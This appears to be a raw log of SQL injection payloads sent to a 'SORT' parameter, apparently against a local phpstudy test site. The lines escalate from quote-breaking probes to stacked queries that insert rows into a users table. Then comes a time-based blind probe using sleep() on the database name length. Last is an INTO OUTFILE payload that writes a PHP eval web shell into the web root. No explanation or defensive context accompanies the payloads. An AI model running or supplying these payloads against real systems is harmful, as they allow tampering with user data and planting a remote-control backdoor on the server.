SORT:1
SORT:1';
SORT:1'
SORT:1
SORT:2
SORT:3
SORT:4
SORT:2
SORT:1
SORT:1
SORT:1
SORT:2
SORT:3
SORT:3' ; insert into users values(14,'a','a') -- 
SORT:3
SORT:3' ; insert into users values(14,'a','a') -- 
SORT:3' ; insert into users values(15, 'a', 'a') -- 
SORT:3
SORT:1
SORT:1'
SORT:1' and '1
SORT:1' and if((length(database()))>5,sleep(1),1) or '1
SORT:1';select '<?PHP @eval($_POST["pass"])?>' into outfile 'D:\\phpstudy\\PHPTutorial\\WWW\\x.php' 
SORT:1';select '<?PHP @eval($_POST["pass"])?>' into outfile 'D:\\phpstudy\\PHPTutorial\\WWW\\x.php' -- 
